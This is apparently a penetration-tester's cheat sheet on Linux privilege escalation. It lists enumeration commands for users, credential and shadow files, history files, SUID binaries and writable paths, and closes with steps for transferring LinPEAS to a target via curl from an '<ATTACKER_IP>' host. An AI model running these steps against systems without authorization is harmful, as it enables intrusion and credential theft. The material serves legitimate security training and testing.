LINUX PRIVESC

PRIMARY CATEGORY → LINUX PENTESTING

Components ⟡

• 
  • NFS NO_ROOT_SQUASH
• 
  • LIBRARY ABUSE
• 
  • WILDCARD ABUSE
• 
  • ESCAPE RSHELLS
• 
  • SPECIAL PERMISSIONS
• 
  • PRIVILEGED GROUPS
• 
  • CAPABILITIES
• 
  • TERMINAL MULTIPLEXER
• 
  • CRON JOB ABUSE
• 
  • CONTAINERS ABUSE
• 
  • K8S ABUSE
• 
  • LOGROTATE ABUSE
• 
  • KERNEL ABUSE
• 
  • SUDO ABUSE
• 
  • POLKIT ABUSE
• 
  • ANSIBLE PLAYBOOK
• 
  • CRED. HUNTING
• 
  • NETWORK CRED. HUNTING

---

Manual Enumeration

OS

cat /etc/os-release
cat /etc/issue
hostnamectl
lsb_release -a

Environment Parameters

echo "$PATH"
declare -p -- PATH
env

Kernel Version

uname -a

Available Shells

Look for TMUX and SCREEN ( Vulnerable Versions or Existing Sessions )

Vulnerable Bash version → ShellShock

cat /etc/shells

Network

Network Interfaces

Look for any other existing and accesible subnets

ip a s
ifconfig
ls /sys/class/net

Routing Table

ip route list
route
netstat -rn

DNS | Name Resolution

cat /etc/hosts
cat /etc/resolv.conf

ARP Table

Look for other existing hosts

arp -a

FS, Drives and Shares

Mounted FS

df -hTv

Unmounted FS

grep -v '#' /etc/fstab | column -t

Drives and Shares

Look for additional Drives or unmounted File Systems

lsblk -fm
lpstat # Printers
mount
cat /etc/fstab

Users and Groups

Existing Users

Look for existing hashes on /etc/passwd

Read permissions on /etc/shadow

cat /etc/passwd
getent passwd

Existing Groups

cat /etc/groups

• List members of any existing group

getent group <GROUP> # getent group sudo

Users’s Home Directory

Look for accesible user directories

Sensitive Files → Shell History files and SSH Keys within them

ls /home

Users’s Last Login

lastlog

Logged in Users

w
who

Files and Directories

Hidden Resources

find / -name '.*' -type f -ls 2> /dev/null # Files
find / -name '.*' -type d -ls 2> /dev/null # Directories

Writable Resources

find / -type f -writable -ls 2> /dev/null # Files
find / -type d -writable -ls 2> /dev/null # Directories

Owned Resources

• Current User

find / \( -path '/proc' -o -path '/sys' -o -path '/run' \) -prune -o -user "$USER" -ls 2> /dev/null

• Current User’s Group

find / \( -path '/proc' -o -path '/sys' -o -path '/run' \) -prune -o -group "$USER" -ls 2> /dev/null

Temporary Files

find /tmp /var/tmp /dev/shm -type f -ls 2> /dev/null

Configuration Files

find / -regextype posix-extended -iregex '.*\.conf(ig)?' -ls 2> /dev/null

Scripts

find / \( -path '*/src/*' -o -path '*/snap/*' -o -path '*/share/*' \) -prune -o -regextype posix-extended -iregex '.*\.(sh|bash|zsh)$' -ls

History

Command History

history

Shells’ History Files

cat /home/<USER>/.bash_history # .zsh_history and so on

find / -regextype posix-extended -iregex '.*_hist(ory)?$' -type f -ls 2> /dev/null

Cron Jobs

ls -la /etc/cron.daily

Running Processes

ps -faux
ps aux

find /proc -name cmdline -exec cat {} + 2>/dev/null | tr '' '\n'

Installed Packages

apt list --installed | sed 's@/@ @g' | awk '{ print $1, $3 }' | less

Sudo Version

sudo --version | head -n1

Binaries

System Binaries

find /bin /usr/bin /usr/sbin -type f -ls 2> /dev/null

SUID Binaries

find / -type f -perm -4000 -ls 2>/dev/null

Trace System Calls

strace <COMMAND>

---

Automated Enumeration

LinPEAS

Setup

• Downloading the script

From the attacker ⚔️

curl --silent --location --request GET 'https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh' --output linpeas.bash

• Transferring it to the target

From the attacker ⚔️

python -m http.server 80

From the target 🎯

cd /dev/shm && curl --silent --location --request GET 'http://<ATTACKER_IP>/linpeas.bash' --remote-name

• Running the script

bash linpeas.bash |& tee -a linpeas.output

Subsequent inspection

less -R ./linpeas_output